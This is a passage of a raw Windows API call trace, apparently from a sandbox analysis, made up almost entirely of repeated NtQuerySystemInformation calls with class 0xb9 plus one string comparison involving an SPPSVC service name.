Length=0x28, ResultLength=0x0) [0239.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb60, Length=0x38, ResultLength=0x0) [0239.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9e0, Length=0x20, ResultLength=0x0) [0239.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e960, Length=0x20, ResultLength=0x0) [0239.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e960, Length=0x20, ResultLength=0x0) [0239.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e960, Length=0x20, ResultLength=0x0) [0239.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb60, Length=0x38, ResultLength=0x0) [0239.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9e0, Length=0x20, ResultLength=0x0) [0239.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e970, Length=0x20, ResultLength=0x0) [0239.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e970, Length=0x20, ResultLength=0x0) [0239.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.927] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.927] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f180, Length=0x50, ResultLength=0x0) [0239.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f180, Length=0x50, ResultLength=0x0) [0239.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f180, Length=0x50, ResultLength=0x0) [0239.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f070, Length=0x50, ResultLength=0x0) [0239.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f070, Length=0x50, ResultLength=0x0) [0239.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f070, Length=0x50, ResultLength=0x0) [0239.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f070, Length=0x50, ResultLength=0x0) [0239.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efa0, Length=0x38, ResultLength=0x0) [0239.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edd0, Length=0x28, ResultLength=0x0) [0239.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edd0, Length=0x28, ResultLength=0x0) [0239.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edd0, Length=0x28, ResultLength=0x0) [0239.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee40, Length=0x28, ResultLength=0x0) [0239.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efa0, Length=0x38, ResultLength=0x0) [0239.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efa0, Length=0x38, ResultLength=0x0) [0239.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee20, Length=0x20, ResultLength=0x0) [0239.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edb0, Length=0x20, ResultLength=0x0) [0239.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edb0, Length=0x20, ResultLength=0x0) [0239.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x50, ResultLength=0x0) [0239.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x50, ResultLength=0x0) [0239.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x50, ResultLength=0x0) [0239.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0239.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0239.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0239.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0239.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ede0, Length=0x38, ResultLength=0x0) [0239.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0239.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0239.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0239.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec80, Length=0x28, ResultLength=0x0) [0239.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ede0, Length=0x38, ResultLength=0x0) [0239.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ede0, Length=0x38, ResultLength=0x0) [0239.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec60, Length=0x20, ResultLength=0x0) [0239.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebf0, Length=0x20, ResultLength=0x0) [0239.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebf0, Length=0x20, ResultLength=0x0) [0239.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f130, Length=0x40, ResultLength=0x0) [0239.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f090, Length=0x40, ResultLength=0x0) [0239.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f090, Length=0x40, ResultLength=0x0) [0239.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efb0, Length=0x30, ResultLength=0x0) [0239.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efb0, Length=0x30, ResultLength=0x0) [0239.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb8, Length=0x30, ResultLength=0x0) [0239.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee20, Length=0x38, ResultLength=0x0) [0239.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebe0, Length=0x50, ResultLength=0x0) [0239.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebe0, Length=0x50, ResultLength=0x0) [0239.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebe0, Length=0x50, ResultLength=0x0) [0239.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ead0, Length=0x50, ResultLength=0x0) [0239.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ead0, Length=0x50, ResultLength=0x0) [0239.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ead0, Length=0x50, ResultLength=0x0) [0239.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ead0, Length=0x50, ResultLength=0x0) [0239.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea00, Length=0x38, ResultLength=0x0) [0239.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e830, Length=0x28, ResultLength=0x0) [0239.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e830, Length=0x28, ResultLength=0x0) [0239.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e830, Length=0x28, ResultLength=0x0) [0239.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e8a0, Length=0x28, ResultLength=0x0) [0239.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea00, Length=0x38, ResultLength=0x0) [0239.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea00, Length=0x38, ResultLength=0x0) [0239.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e880, Length=0x20, ResultLength=0x0) [0239.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e810, Length=0x20, ResultLength=0x0) [0239.952] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.952] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.952] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.952] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e810, Length=0x20, ResultLength=0x0) [0239.952] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.952] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.952] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.952] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.952] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.952] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.952] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f090, Length=0x40, ResultLength=0x0) [0239.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f090, Length=0x40, ResultLength=0x0) [0239.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f090, Length=0x40, ResultLength=0x0) [0239.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efb0, Length=0x30, ResultLength=0x0) [0239.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efb0, Length=0x30, ResultLength=0x0) [0239.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb8, Length=0x30, ResultLength=0x0) [0239.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee20, Length=0x38, ResultLength=0x0) [0239.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec90, Length=0x50, ResultLength=0x0) [0239.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0239.956] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0239.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec90, Length=0x50, ResultLength=0x0) [0239.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec90, Length=0x50, ResultLength=0x0) [0239.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec90, Length=0x50, ResultLength=0x0) [0239.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebc0, Length=0x38, ResultLength=0x0) [0239.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9f0, Length=0x28, ResultLength=0x0) [0239.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9f0, Length=0x28, ResultLength=0x0) [0239.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9f0, Length=0x28, ResultLength=0x0) [0239.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea60, Length=0x28, ResultLength=0x0) [0239.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebc0, Length=0x38, ResultLength=0x0) [0239.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eae0, Length=0x28, ResultLength=0x0) [0239.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eae0, Length=0x28, ResultLength=0x0) [0239.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebc0, Length=0x38, ResultLength=0x0) [0239.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea40, Length=0x20, ResultLength=0x0) [0239.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9c0, Length=0x20, ResultLength=0x0) [0239.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9c0, Length=0x20, ResultLength=0x0) [0239.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9c0, Length=0x20, ResultLength=0x0) [0239.963] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.963] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.963] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.963] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.963] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebc0, Length=0x38, ResultLength=0x0) [0239.963] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea40, Length=0x20, ResultLength=0x0) [0239.963] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9d0, Length=0x20, ResultLength=0x0) [0239.963] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.963] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.963] NtQuerySystemInformation (SystemInformationClass=0xb9, 